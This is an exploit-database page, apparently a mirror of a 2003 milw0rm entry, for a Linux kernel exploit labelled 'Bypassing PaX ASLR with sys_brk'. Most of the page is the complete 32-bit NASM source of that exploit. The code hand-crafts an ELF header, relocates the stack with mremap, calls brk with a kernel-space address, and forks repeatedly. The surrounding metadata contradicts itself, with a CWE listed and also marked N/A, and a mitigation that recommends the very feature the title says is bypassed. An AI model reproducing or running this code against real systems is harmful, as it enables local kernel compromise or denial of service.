Bypassing PaX ASLR with sys_brk

vendor:

N/A

by:

Christophe Devine and Julien Tinnes

7,2

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2002

Bypassing PaX ASLR with sys_brk

This exploit uses sys_brk directly to expand his break and doesn't rely on the ELF loader to do it. To bypass a check in sys_brk against available memory, a high virtual address is used as the base address. In most cases, the stack is moved so that the break can be expanded.

Mitigation:

Enabling PaX ASLR and other security features can help mitigate this vulnerability.

Source

Exploit-DB raw data:

; E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/131/
;
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;


  BITS 32

                org     0xBFFF0000

  ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1            ;   e_ident
        times 9 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      2                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx

  ehdrsize      equ     $ - ehdr

  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      7                               ;   p_flags
                dd      0x1000                          ;   p_align

  phdrsize      equ     $ - phdr

  _start:

		; ** Make sure the stack is not above us

                mov     eax, 163         ; mremap
                mov     ebx, esp
		
		and	ebx, ~(0x1000 - 1)	; align to page size

		mov	ecx, 0x1000	; we suppose stack is one page only
                mov     edx, 0x9000	; be sure it can't get mapped after
					; us
                mov     esi,1		; MREMAP_MAYMOVE
                int     0x80


		and	esp, (0x1000 - 1)	; offset in page
		add	esp, eax		; stack ptr to new location
						; nb: we don't fix
						; pointers so environ/cmdline
						; are not available

  		mov	eax,152		; mlockall (for tests as root)
  		mov	ebx,2		; MCL_FUTURE
  		int	0x80

		; get VMAs for the kernel memory

                mov     eax,45          ; brk
                mov     ebx,0xC0500000
		int	0x80

		
		mov	ecx, 4
  loop0:
		
  		mov	eax, 2		; fork
  		int	0x80
		loop	loop0

  _idle:

                mov     eax,162         ; nanosleep
                mov     ebx,timespec
                int     0x80
                jmp     _idle

  timespec      dd      10,0

  filesize      equ     $ - $$

; milw0rm.com [2003-12-02]